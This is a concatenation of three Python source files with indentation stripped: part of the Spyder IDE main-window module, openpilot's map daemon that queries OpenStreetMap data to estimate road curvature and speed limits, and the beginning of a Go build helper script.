widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
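    # Worked example (illustrative): with a path dict such as
    #   OrderedDict([('/some/path', True), ('/some/other/path', False)])
    # get_spyder_pythonpath() returns ['/some/path'], i.e. only the entries whose
    # state is True (active) end up in the PYTHONPATH handed to kernels.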
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:  # Serve until the socket is closed or an unrecoverable error occurs
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
        # Note: the extra 6 pixels at the top make it look better.
        # FIXME: Why is this using the toolbars menu? A: So the switcher is not
        # placed on top of the toolbars.
        # Toolbars should probably only be taken into account for this 'delta'
        # when they are visible.
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
mapd.py
|
#!/usr/bin/env python3
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
from scipy import spatial
except ImportError as e:
import os
import sys
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
from selfdrive.mapd import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from cereal.services import service_list
import cereal.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
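# Illustrative use of the query builder above (a sketch only; the coordinates are
# hypothetical and nothing here is executed at import time):
#
#   >>> q = build_way_query(52.5200, 13.4050, radius=3000)
#   >>> api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
#   >>> result = api.query(q)
#   >>> len(result.ways), len(result.areas)   # drivable ways plus country/region areas
#
# The (around:radius,lat,lon) filter keeps ways within `radius` metres of the GPS
# fix, the highway!~ regex drops footways, cycleways and similar, and the trailing
# is_in/area block returns admin_level 2/4 areas so query_thread() can fill in the
# country and region.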
def query_thread():
global last_query_result, last_query_pos, cache_valid
api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
        if dist < 1000:  # Only re-query after moving at least 1 km from the previous query position
continue
if dist > 3000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=3000)
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
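# Note (added for clarity): on success the shared state above is a 5-tuple
# (overpass_result, ecef_kd_tree, nodes, node_to_way, location_info), which
# mapsd_thread() below hands to Way.closest() while holding query_lock. The cache
# covers a 3 km circle around the query position, is refreshed after roughly 1 km
# of travel, and is declared invalid (cache_valid = False) once the car is more
# than 3 km from where it was downloaded.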
def mapsd_thread():
global last_gps
gps_sock = messaging.sub_sock('gpsLocation', conflate=True)
gps_external_sock = messaging.sub_sock('gpsLocationExternal', conflate=True)
map_data_sock = messaging.pub_sock('liveMapData')
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
while True:
gps = messaging.recv_one(gps_sock)
gps_ext = messaging.recv_one_or_none(gps_external_sock)
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
gps = gps.gpsLocation
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed()
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
# TODO: use the function below to anticipate upcoming speed limits
#max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
#if max_speed_ahead is not None and max_speed_ahead_dist is not None:
# dat.liveMapData.speedLimitAheadValid = True
# dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
# dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
advisory_max_speed = cur_way.advisory_max_speed()
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
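# Sketch (added, not part of the original helpers): the curvature computation above
# relies on circle_through_points() from mapd_helpers, which fits a circle through
# three consecutive path points and reports its radius; curvature is then 1/radius.
# A minimal standalone version of that idea for 2D points, using the standard
# circumcircle formula, could look like this:
def _example_curvature_from_three_points(p1, p2, p3):
    """Return 1/R for the circle through three 2D points (0.0 if collinear)."""
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    # Twice the signed area of the triangle; zero means the points are collinear.
    d = 2.0 * (x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2))
    if abs(d) < 1e-12:
        return 0.0
    sq1, sq2, sq3 = x1 * x1 + y1 * y1, x2 * x2 + y2 * y2, x3 * x3 + y3 * y3
    ux = (sq1 * (y2 - y3) + sq2 * (y3 - y1) + sq3 * (y1 - y2)) / d
    uy = (sq1 * (x3 - x2) + sq2 * (x1 - x3) + sq3 * (x2 - x1)) / d
    radius = np.hypot(x1 - ux, y1 - uy)
    return 1.0 / radius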
def main():
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
go_tool.py
|
from __future__ import absolute_import
import argparse
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import six
from functools import reduce
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
    # Temporary workaround for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = [x for x in args.srcs if x not in cgo_srcs_set]
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
    # Add lexical order by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
v1 = tuple(str(int(x)).zfill(8) for x in version1.split('.'))
v2 = tuple(str(int(x)).zfill(8) for x in version2.split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
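# Quick illustration (added): each dotted component is zero-padded to 8 digits and
# the resulting tuples are compared, so
#   compare_versions('1.12', '1.13') ==  1   (version1 is older)
#   compare_versions('1.13', '1.12') == -1   (version1 is newer)
#   compare_versions('1.12', '1.12') ==  0
# which is why `compare_versions('1.12', args.goversion) >= 0` further below reads
# as "the configured Go toolchain is at least 1.12".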
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
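# Illustrative mappings produced by get_import_path() (the module paths below are
# hypothetical examples, not taken from a real build):
#   'contrib/go/_std/src/fmt'      -> ('fmt', True)                                 # std lib
#   'vendor/golang.org/x/sys/unix' -> ('golang.org/x/sys/unix', False)              # vendored
#   'library/go/core/log'          -> ('a.yandex-team.ru/library/go/core/log', False)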
def call(cmd, cwd, env=None):
# sys.stderr.write('{}\n'.format(' '.join(cmd)))
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = [x for x in srcs if x.endswith('.go')]
args.asm_srcs = [x for x in srcs if x.endswith('.s')]
args.objects = [x for x in srcs if x.endswith('.o') or x.endswith('.obj')]
args.symabis = [x for x in srcs if x.endswith('.symabis')]
args.sysos = [x for x in srcs if x.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in six.iteritems(import_map):
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in six.iteritems(module_map):
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# sys.stderr.writelines('{}\n'.format(l) for l in lines)
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content)
return f.name
return None
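# Note (added): the temporary file produced above is what gets passed to the Go
# compiler/linker via -importcfg below. Each line follows the '{key} {from}={to}'
# shape built in the loop, schematically:
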